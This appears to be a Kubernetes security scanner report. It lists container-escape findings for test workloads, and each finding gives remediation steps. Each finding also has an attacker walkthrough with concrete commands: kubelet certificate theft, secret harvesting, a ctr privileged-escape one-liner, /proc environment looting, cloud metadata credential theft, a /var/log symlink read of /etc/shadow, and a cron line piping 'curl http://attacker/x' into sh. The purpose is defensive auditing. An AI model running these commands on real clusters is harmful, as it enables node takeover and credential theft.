Mounting / is one of the few configurations that, by itself, guarantees host compromise without requiring a CVE, kernel exploit, or even the privileged flag. The kubelet stores per-pod secrets at /var/lib/kubelet/pods/<uid>/volumes/kubernetes.io~secret/<name>/... in cleartext (tmpfs); a read-only host-root mount is enough to copy them all out. A read-write mount turns this into trivial persistence: write to /etc/cron.d/, modify /etc/sudoers, drop a shared-object into /etc/ld.so.preload, or, on a control-plane node, drop a malicious manifest into /etc/kubernetes/manifests/ which the kubelet then runs as a static pod with full privileges.

A single command sequence (chroot /host, cat /host/var/lib/kubelet/pki/kubelet-client-current.pem, then kubectl --kubeconfig=<crafted> get secrets -A) yields full secret enumeration on every pod on the node. Public exploit aids (kubeletmein, peirates) automate the chain.

Impact Read every secret on the node; write to host cron, SSH, kubelet PKI, or static-pod manifests; persistence and pivot to cluster-admin.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
Technique: Container escape to host

The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

  1. RCE in the pod that mounts / at /host.
  2. Steal kubelet creds: cp /host/var/lib/kubelet/pki/kubelet-client-current.pem /tmp/k.pem.
  3. Enumerate other pods' secrets: find /host/var/lib/kubelet/pods -path '*/kubernetes.io~secret/*' -type f -exec cat {} \;.
  4. Persist: echo '* * * * * root curl http://attacker/x|sh' > /host/etc/cron.d/k8s (RW) or, on a control-plane node, cp evil-pod.yaml /host/etc/kubernetes/manifests/.
  5. With kubelet creds, run kubectl --client-certificate=/tmp/k.pem ... and harvest cluster secrets.
Remediation
Never mount / from the node. Use specific subpaths or projected volumes if absolutely required.
  1. Identify the actual file or directory the workload needs and replace the mount with the narrowest possible path (and readOnly: true); see the volume sketch after this list.
  2. Where possible, replace hostPath entirely with a CSI-backed volume, ConfigMap, Secret, or projected volume.
  3. Apply Pod Security Admission baseline to the namespace (forbids hostPath). For unavoidable cases, allowlist via Kyverno/Gatekeeper that pins the path and readOnly: true.
  4. Validate: kubectl get deployment/risky-app -n vulnerable -o jsonpath='{.spec.template.spec.volumes[*].hostPath.path}' does not contain /.
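Where some host data genuinely must be visible, step 1 amounts to replacing the / mount with the narrowest possible read-only volume. A pod-template fragment might look like this (the path is purely illustrative):

# Pod template fragment: mount only the one directory needed, read-only.
volumes:
  - name: host-ca-certs           # illustrative name
    hostPath:
      path: /etc/ssl/certs        # the one directory the app actually reads
      type: Directory
containers:
  - name: app
    volumeMounts:
      - name: host-ca-certs
        mountPath: /etc/ssl/certs
        readOnly: true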
Evidence
Volume: rootfs
Host path: /
Node root filesystem (full host takeover)
Show raw JSON
{
  "path": "/",
  "volume": "rootfs"
}
CRITICAL

Privileged container app in Deployment/vulnerable/risky-app

KUBE-ESCAPE-001 1 subject Score 9.9
MITRE ATT&CK: T1611 · T1610 · T1068

Affected subject

CRITICAL Deployment/vulnerable/risky-app Workload 9.9
Privileged container app in Deployment/vulnerable/risky-app
Scope · Workload Workload Deployment/vulnerable/risky-app
Category: Privilege Escalation Resource: Deployment/vulnerable/risky-app Namespace: vulnerable

Container app in Deployment/vulnerable/risky-app is configured with securityContext.privileged: true. A privileged container retains every Linux capability (CAP_SYS_ADMIN, CAP_SYS_MODULE, CAP_NET_ADMIN, etc.), bypasses all Linux Security Module profiles (AppArmor/SELinux), runs without the default seccomp profile, and shares /dev with the host. From the kernel's perspective it is indistinguishable from a process running directly on the node.

This is the single most dangerous PodSpec setting: capability drops, read-only root filesystem, and runAsNonRoot are all neutralised because the container can simply remount, reload kernel modules, or call setuid(0). The Pod Security Standards explicitly forbid privileged containers at both Baseline and Restricted levels.

Real-world breakout: an attacker with code execution loads a kernel module with insmod (CAP_SYS_MODULE), or uses mknod to recreate /dev/sda1, mounts the host root, and writes to /root/.ssh/authorized_keys. Public exploit tooling (deepce, kdigger -ac, kubeletmein) automates these in seconds.

Impact Full root on the host node: read every Secret on the node, exfiltrate the kubelet client certificate, schedule pods anywhere, and pivot to other nodes.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
Technique: Container escape to host

The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

  1. Attacker gains code execution inside the privileged pod (RCE, malicious image, SSRF→shell).
  2. They confirm the configuration with kdigger dig admission or deepce.sh.
  3. They mount the host filesystem: mkdir /host && mount /dev/sda1 /host.
  4. They steal kubelet credentials from /host/var/lib/kubelet/pki/kubelet-client-current.pem or write /host/root/.ssh/authorized_keys.
  5. With kubelet creds they list every Pod and Secret on the node, then escalate to cluster-admin via the cgroup-release-agent technique or nsenter -t 1 -a.
Remediation
Remove privileged: true and explicitly grant only the Linux capabilities the workload actually needs.
  1. Audit why the container needs privileged. Most apps do not. Trace which capability is actually required (often only NET_BIND_SERVICE).
  2. Replace privileged: true with capabilities.drop: [ALL] and an explicit capabilities.add: [<NEEDED_CAP>]. Add allowPrivilegeEscalation: false, readOnlyRootFilesystem: true, runAsNonRoot: true, and seccompProfile.type: RuntimeDefault (see the securityContext sketch after this list).
  3. Enforce at admission time: label the namespace pod-security.kubernetes.io/enforce: baseline (or restricted) so future regressions are blocked.
  4. Validate with kubectl get deployment/risky-app -n vulnerable -o jsonpath='{.spec.template.spec.containers[*].securityContext.privileged}' returning empty/false.
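Putting steps 1 and 2 together, the container's securityContext ends up looking something like this; NET_BIND_SERVICE stands in for whichever single capability the audit actually identifies:

# Replacement for privileged: true on the app container.
securityContext:
  privileged: false
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true
  runAsNonRoot: true
  capabilities:
    drop: ["ALL"]
    add: ["NET_BIND_SERVICE"]   # only if the audit shows it is needed
  seccompProfile:
    type: RuntimeDefault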
Evidence
Container: app
Show raw JSON
{
  "container": "app"
}
CRITICAL

Containerd socket mounted into Deployment/vulnerable/socket-mounts-app (volume containerd-sock)

KUBE-CONTAINERD-SOCKET-001 1 subject Score 9.8
MITRE ATT&CK: T1611 · T1610 · T1068

Affected subject

CRITICAL Deployment/vulnerable/socket-mounts-app Workload 9.8
Containerd socket mounted into Deployment/vulnerable/socket-mounts-app (volume containerd-sock)
Scope · Workload Workload Deployment/vulnerable/socket-mounts-app
Category: Privilege Escalation Resource: Deployment/vulnerable/socket-mounts-app Namespace: vulnerable

Workload Deployment/vulnerable/socket-mounts-app mounts containerd's UNIX socket (/run/containerd/containerd.sock or /var/run/containerd/containerd.sock) into the container via volume containerd-sock. Containerd runs as root and is the runtime the kubelet uses to start every pod on the node. In practice, this means that if you can talk to its API, you can create, modify, or exec into any container on the host, including kube-system control-plane pods.

This is the modern equivalent of the docker.sock anti-pattern. Since Kubernetes 1.24 removed dockershim, most clusters use containerd or CRI-O directly; the same breakout primitives apply but the tooling differs (ctr, crictl). Kubernetes places its containers under containerd namespace k8s.io, so ctr -n k8s.io containers list enumerates every pod on the node.

The Grey Corner's containerd-socket-exploitation series documents the one-liner: install or copy the ctr binary, then run ctr --address /run/containerd/containerd.sock -n k8s.io run --rm --mount type=bind,src=/,dst=/host,options=rbind:rw --privileged docker.io/library/alpine:latest pwn /bin/sh. The result is a privileged container with / mounted at /host. From there an attacker reads the kubelet client cert, dumps every pod's secrets, or task execs a reverse shell into the apiserver static pod on a control-plane node.

Impact Root on the node and arbitrary code execution inside any container on the node, including kube-system static pods. Equivalent to compromising the kubelet itself.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Code execution in the pod with containerd.sock mounted.
  2. ls -la /run/containerd/containerd.sock; ctr --address /run/containerd/containerd.sock version.
  3. List target containers: ctr -n k8s.io containers list. Note kube-apiserver, etcd, or any victim app.
  4. Spawn a privileged escape container: ctr -n k8s.io run --rm --privileged --mount type=bind,src=/,dst=/host,options=rbind:rw docker.io/library/alpine:latest x /bin/sh -c 'chroot /host'.
  5. From host, harvest /var/lib/kubelet/pki/kubelet-client-current.pem and pivot to the API server.
Remediation
Remove the containerd-socket hostPath mount; use the Kubernetes API or CRI-aware tools instead.
  1. Determine why the workload needs CRI access. Legitimate use is rare and typically limited to specific node-agent observability tools. Replace with a Kubernetes-API-driven alternative.
  2. Remove the hostPath volume and volumeMount targeting /run/containerd/containerd.sock (and aliases).
  3. For monitoring use cases, use the kubelet's /metrics/cadvisor endpoint behind an RBAC-scoped ServiceAccount, not raw socket access.
  4. Validate: kubectl get deployment/socket-mounts-app -n vulnerable -o yaml | grep -i containerd returns no socket mount.
Evidence
Volume: containerd-sock
Host path: /var/run/containerd/containerd.sock
containerd socket (container engine takeover)
Show raw JSON
{
  "path": "/var/run/containerd/containerd.sock",
  "volume": "containerd-sock"
}
CRITICAL

Pod shares host PID namespace (hostPID: true) in Deployment/vulnerable/host-ns-app

KUBE-ESCAPE-002 1 subject Score 9.0
MITRE ATT&CK: T1611 · T1552.001 · T1057

Affected subject

CRITICAL Deployment/vulnerable/host-ns-app Workload 9.0
Pod shares host PID namespace (hostPID: true) in Deployment/vulnerable/host-ns-app
Scope · Workload Workload Deployment/vulnerable/host-ns-app
Category: Privilege Escalation Resource: Deployment/vulnerable/host-ns-app Namespace: vulnerable

Workload Deployment/vulnerable/host-ns-app sets spec.hostPID: true, joining the host's PID namespace. Every process on the node (kubelet, container runtime, other tenant workloads, sshd, cloud-init agents) is visible via /proc and addressable by PID from inside this pod.

The risk is twofold. First, information disclosure: /proc/<pid>/environ, /proc/<pid>/cmdline, and /proc/<pid>/root/... leak environment variables (which often contain database passwords, cloud credentials, and Kubernetes service-account tokens), CLI args, and arbitrary file contents from other containers' rootfs. Second, when combined with CAP_SYS_PTRACE or privileged: true, an attacker can nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash and land directly in the host's mount namespace as root.

Bishop Fox's bad-pods library and kdigger's processes bucket grep /proc/*/environ for AWS_, KUBE_, DATABASE_URL, and service-account JWTs. Even without extra capabilities, host-PID alone is enough to harvest cleartext credentials from neighboring pods on the same node. This is a classic noisy-neighbor escalation primitive (TeamTNT, Hildegard).

Impact Read process arguments, environment variables, and /proc/<pid>/root of every other pod on the node; harvest service-account tokens and cloud credentials from neighbors.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
Technique: Container escape to host

The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

  1. Gain code execution in the pod with hostPID: true.
  2. Enumerate processes: ps -ef shows host kubelet, runc, and sibling containers.
  3. Loot environments: for p in /proc/[0-9]*/environ; do tr '\0' '\n' < $p; done | grep -iE 'token|secret|aws|key'.
  4. Read other pods' service-account tokens via cat /proc/<pid>/root/var/run/secrets/kubernetes.io/serviceaccount/token.
  5. If CAP_SYS_PTRACE or privileged is also present, nsenter -t 1 -a to land in the host root namespace and persist via SSH key or systemd unit.
Remediation
Set spec.hostPID: false (or omit it; the default is false).
  1. Identify why hostPID was set; legitimate uses are limited to node-monitoring DaemonSets like node-exporter.
  2. Remove hostPID: true from the pod template (or set explicitly to false).
  3. Apply Pod Security Admission baseline: kubectl label ns <ns> pod-security.kubernetes.io/enforce=baseline.
  4. Validate with kubectl get deployment/host-ns-app -n vulnerable -o jsonpath='{.spec.template.spec.hostPID}' returning empty or false.
Evidence
hostPID: true
Shares the node's process namespace (can ptrace/kill node processes)
Show raw JSON
{
  "hostPID": true
}
HIGH

/var/log mounted from host into Deployment/vulnerable/socket-mounts-app enables log-symlink escape primitive

KUBE-ESCAPE-008 1 subject Score 8.5
MITRE ATT&CK: T1611 · T1552.001 · T1083

Affected subject

HIGH Deployment/vulnerable/socket-mounts-app Workload 8.5
/var/log mounted from host into Deployment/vulnerable/socket-mounts-app enables log-symlink escape primitive
Scope · Workload Workload Deployment/vulnerable/socket-mounts-app
Category: Privilege Escalation Resource: Deployment/vulnerable/socket-mounts-app Namespace: vulnerable

Workload Deployment/vulnerable/socket-mounts-app mounts /var/log from the host via volume var-log. This directory is the canonical container-log staging area: the kubelet writes per-pod logs into /var/log/pods/<ns>_<pod>_<uid>/<container>/0.log as symlinks pointing to the runtime's actual log files.

The exploit is that kubectl logs causes the kubelet (running as root) to read those symlinks. If a pod can write into the host's /var/log (because it has the directory mounted), it can replace its own 0.log symlink with one pointing to ANY file on the node, e.g. /etc/shadow or /var/lib/kubelet/pki/kubelet-client-current.pem. The next kubectl logs <pod> returns the contents of that file as if it were the container's stdout. This is the well-known /var/log symlink escape (Aqua Security, KubeHound CE_VAR_LOG_SYMLINK, CVE-2017-1002101, CVE-2021-25741).

The pattern is very common in misconfigured log shippers (Fluentd, Filebeat, Promtail). On multi-tenant clusters where any user can kubectl logs against pods they own, this is a universal arbitrary-file-read primitive.

Impact Arbitrary file read on the host node as root via the kubelet's log-resolving behavior; compromise kubelet PKI, /etc/shadow, etcd snapshots, every pod's mounted secrets.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
Technique: Container escape to host

The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

  1. RCE in a pod that has hostPath: /var/log mounted (RW).
  2. Find own pod's log-symlink directory: ls -la /var/log/pods/.
  3. Replace 0.log symlink: ln -sf /etc/shadow /var/log/pods/<ns>_<pod>_<uid>/<container>/0.log.
  4. Trigger the read: kubectl logs <pod> -c <container> returns /etc/shadow.
  5. Repeat for kubelet PKI and pivot via direct apiserver auth as system:node:<nodeName>.
Remediation
Do not mount /var/log (or its subdirectories) from the host into application pods; use the kubelet logs API or a log-aggregator sidecar pattern.
  1. For log-shipper DaemonSets that genuinely need host logs, switch to read-only mount AND restrict to /var/log/containers and /var/log/pods only (not the parent /var/log); see the mount sketch after this list.
  2. Configure the log shipper to refuse following symlinks (e.g. Fluent Bit Path_Key) and run as a non-root UID.
  3. For application pods, route logs to stdout/stderr only. Kubernetes captures these without any hostPath. Drop the hostPath mount.
  4. Validate: kubectl get deployment/socket-mounts-app -n vulnerable -o yaml | grep -A2 hostPath does not contain /var/log (or only narrow read-only sub-path).
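For the DaemonSet case in step 1, the mounts narrow to something like the following pod-template fragment: read-only, and limited to the two log subdirectories rather than the parent /var/log:

# Log-shipper pod template fragment: read-only, scoped log mounts.
volumes:
  - name: var-log-pods
    hostPath:
      path: /var/log/pods
      type: Directory
  - name: var-log-containers
    hostPath:
      path: /var/log/containers
      type: Directory
containers:
  - name: log-shipper             # illustrative name
    volumeMounts:
      - name: var-log-pods
        mountPath: /var/log/pods
        readOnly: true
      - name: var-log-containers
        mountPath: /var/log/containers
        readOnly: true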
Evidence
Volume: var-log
Host path: /var/log
Node logs (symlinks let you read other pods' logs)
Show raw JSON
{
  "path": "/var/log",
  "volume": "var-log"
}
HIGH

Pod shares host network (hostNetwork: true) in Deployment/vulnerable/risky-app

KUBE-ESCAPE-003 1 subject Score 8.1
MITRE ATT&CK: T1611 · T1552.005 · T1046 · T1040

Affected subject

HIGH Deployment/vulnerable/risky-app Workload 8.1
Pod shares host network (hostNetwork: true) in Deployment/vulnerable/risky-app
Scope · Workload Workload Deployment/vulnerable/risky-app
Category: Lateral Movement Resource: Deployment/vulnerable/risky-app Namespace: vulnerable

Workload Deployment/vulnerable/risky-app sets spec.hostNetwork: true. The container is no longer in a sandboxed network namespace. It sees the node's interfaces, listens on the node's IPs and ports, and reaches every loopback service the kubelet talks to.

The most dangerous consequence is that NetworkPolicies cannot apply. Cilium, Calico, and the upstream NetworkPolicy spec key off the pod's veth and labels, and a hostNetwork pod has neither, so all egress filtering is silently bypassed. On managed Kubernetes (EKS/GKE/AKS) the workload can reach the cloud Instance Metadata Service at 169.254.169.254 even when the cluster has set IMDSv2 hop-count protection. The result is a one-step path from container RCE to AWS/Azure/GCP IAM credential theft.

The pod can also bind privileged ports the host already uses, redirect kube-proxy, sniff service traffic, or scan internal-only addresses such as 127.0.0.1:10250 (kubelet) which is otherwise unreachable from a normal pod.

Impact Bypasses NetworkPolicy and IMDSv2 hop protection; container reaches cloud metadata, kubelet localhost, and any node-loopback service. This pivots cluster compromise into cloud-account compromise.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
Technique: Container escape to host

The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

  1. Gain code execution in the pod (web RCE, malicious image).
  2. Confirm hostNetwork: ip addr shows the node's primary interface, not a pod CIDR.
  3. Hit the IMDS: curl -s http://169.254.169.254/latest/api/token -X PUT -H 'X-aws-ec2-metadata-token-ttl-seconds: 21600' then fetch iam/security-credentials/<role>.
  4. Use stolen IAM creds with aws sts get-caller-identity and pivot to S3/EKS API.
  5. Optional: probe 127.0.0.1:10250 (kubelet). If anonymous auth is enabled, run curl -k https://127.0.0.1:10250/pods to enumerate every pod on the node and exec into any of them.
Remediation
Set hostNetwork: false (default) and route any node-level networking through a CNI-managed Service or NetworkPolicy-aware DaemonSet.
  1. Audit if hostNetwork is required. Typically only kube-proxy, CNI agents, or node-local DNS legitimately need it.
  2. Remove hostNetwork: true. If a host port is genuinely required, prefer a Service of type NodePort or an Ingress controller behind a NetworkPolicy.
  3. Enforce IMDSv2 with hop-limit = 1 on every node; apply an egress NetworkPolicy denying 169.254.169.254/32 for application namespaces (see the policy sketch after this list).
  4. Validate: kubectl get deployment/risky-app -n vulnerable -o jsonpath='{.spec.template.spec.hostNetwork}' is empty/false; kubectl exec ... -- curl -m 2 http://169.254.169.254/ should fail.
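The IMDS egress block from step 3 can be sketched as a namespace-wide egress policy that carves out 169.254.169.254 while still allowing all other egress (tighten further as needed):

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-imds-egress          # illustrative name
  namespace: vulnerable
spec:
  podSelector: {}                 # every pod in the namespace
  policyTypes: ["Egress"]
  egress:
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
              - 169.254.169.254/32   # cloud metadata service

As the finding itself notes, this only takes effect once hostNetwork is removed: hostNetwork pods bypass NetworkPolicy entirely.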
Evidence
hostNetwork: true
Shares the node's network namespace (sees every pod's traffic, binds to node IPs)
Show raw JSON
{
  "hostNetwork": true
}
HIGH

Pod shares host IPC (hostIPC: true) in Deployment/vulnerable/host-ns-app

KUBE-ESCAPE-004 1 subject Score 8.0
MITRE ATT&CK: T1611 · T1552.001 · T1005

Affected subject

HIGH Deployment/vulnerable/host-ns-app Workload 8.0
Pod shares host IPC (hostIPC: true) in Deployment/vulnerable/host-ns-app
Scope · Workload Workload Deployment/vulnerable/host-ns-app
Category: Privilege Escalation Resource: Deployment/vulnerable/host-ns-app Namespace: vulnerable

Workload Deployment/vulnerable/host-ns-app sets spec.hostIPC: true, joining the host's IPC (Inter-Process Communication) namespace. The container can read and write the host's POSIX shared-memory segments (/dev/shm), SysV shared memory, message queues, and semaphore arrays.

The attack surface is data, not code execution. Many host-resident processes (caching layers, GPU compute via CUDA's cuMemAlloc, Redis with unixsocket, Postgres' shared buffers, even kernel-side IMA logs) store in-memory state in IPC segments under the assumption no untrusted process can address them. With hostIPC: true an attacker dumps every visible segment, harvests cached secrets, replays message queues, or corrupts semaphores to cause denial-of-service.

Bishop Fox's bad-pods/hostipc example uses ipcs -m to list shared-memory segments and ipcs -p to identify owning PIDs, then cat /dev/shm/* (or attaches via shmat) to extract their contents. hostIPC is forbidden by the Pod Security Standards Baseline level.

Impact Read or modify shared memory and SysV IPC of every process on the node; leak in-memory secrets, GPU buffers, database caches; denial-of-service via semaphore corruption.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
Technique: Container escape to host

The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

  1. Gain code execution in the pod with hostIPC enabled.
  2. Enumerate IPC: ipcs -a lists shared-memory IDs, message queues, and semaphores.
  3. Dump /dev/shm: ls -la /dev/shm; for f in /dev/shm/*; do strings "$f" | grep -iE 'token|secret|key'; done.
  4. Attach to a SysV segment with a small program (shmat(shmid, 0, SHM_RDONLY)) and exfiltrate.
  5. If a co-tenant runs an in-memory cache (Redis without disk persistence, an ML inference engine), extract model weights or session tokens still resident.
Remediation
Set hostIPC: false (default).
  1. Confirm no legitimate IPC sharing requirement; very few application workloads need this. Typically only NVIDIA GPU sharing or some HPC workloads.
  2. Remove hostIPC: true from the pod template.
  3. Where shared memory is a feature need (containers cooperating), use a single Pod with multiple containers and an emptyDir { medium: Memory } volume instead of host IPC (see the sketch after this list).
  4. Validate: kubectl get deployment/host-ns-app -n vulnerable -o jsonpath='{.spec.template.spec.hostIPC}' is empty/false.
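Step 3's in-pod alternative to host IPC is a memory-backed emptyDir shared between the cooperating containers, roughly like this (names and commands are illustrative):

apiVersion: v1
kind: Pod
metadata:
  name: shared-mem-demo           # illustrative name
spec:
  volumes:
    - name: shm
      emptyDir:
        medium: Memory            # tmpfs-backed, visible only inside this Pod
  containers:
    - name: producer
      image: alpine
      command: ["sh", "-c", "while true; do date > /shm/tick; sleep 1; done"]
      volumeMounts:
        - name: shm
          mountPath: /shm
    - name: consumer
      image: alpine
      command: ["sh", "-c", "sleep infinity"]
      volumeMounts:
        - name: shm
          mountPath: /shm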
Evidence
hostIPC: true
Shares the node's IPC namespace (reads other processes' shared memory)
Show raw JSON
{
  "hostIPC": true
}
HIGH

Container api allows privilege escalation in Deployment/flat-network/api

KUBE-PODSEC-APE-001 12 subjects Score 7.8
MITRE ATT&CK: T1548.001 · T1611

Affected subjects (12)

HIGH Deployment/flat-network/api Workload 7.8
Container api allows privilege escalation in Deployment/flat-network/api
Scope · Workload Workload Deployment/flat-network/api
Category: Privilege Escalation Resource: Deployment/flat-network/api Namespace: flat-network

Container api in Deployment/flat-network/api either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true (see the fragment after this list).
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n flat-network -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
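In the pod template, step 1 is a small securityContext addition on the api container; everything else stays as deployed:

# Deployment pod-template fragment (only securityContext changes).
spec:
  template:
    spec:
      containers:
        - name: api
          securityContext:
            allowPrivilegeEscalation: false
            runAsNonRoot: true
            capabilities:
              drop: ["ALL"]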
Evidence
Container: api
Show raw JSON
{
  "container": "api"
}
HIGH DaemonSet/rbac-fixtures/daemon-app Workload 7.8
Container app allows privilege escalation in DaemonSet/rbac-fixtures/daemon-app
Scope · Workload Workload DaemonSet/rbac-fixtures/daemon-app, runs on every node (per-node blast radius)
Category: Privilege Escalation Resource: DaemonSet/rbac-fixtures/daemon-app Namespace: rbac-fixtures

Container app in DaemonSet/rbac-fixtures/daemon-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
Resource: DaemonSet

A DaemonSet schedules one pod per node, typically for cluster infrastructure (CNI, log shipping, node monitoring). DaemonSets are frequent targets because they often need hostNetwork, hostPath, or privileged to do their job, which makes them ideal for attackers if compromised.

  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n rbac-fixtures -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Container: app
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/flat-network/unmatched Workload 7.8
Container app allows privilege escalation in Deployment/flat-network/unmatched
Scope · Workload Workload Deployment/flat-network/unmatched
Category: Privilege Escalation Resource: Deployment/flat-network/unmatched Namespace: flat-network

Container app in Deployment/flat-network/unmatched either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
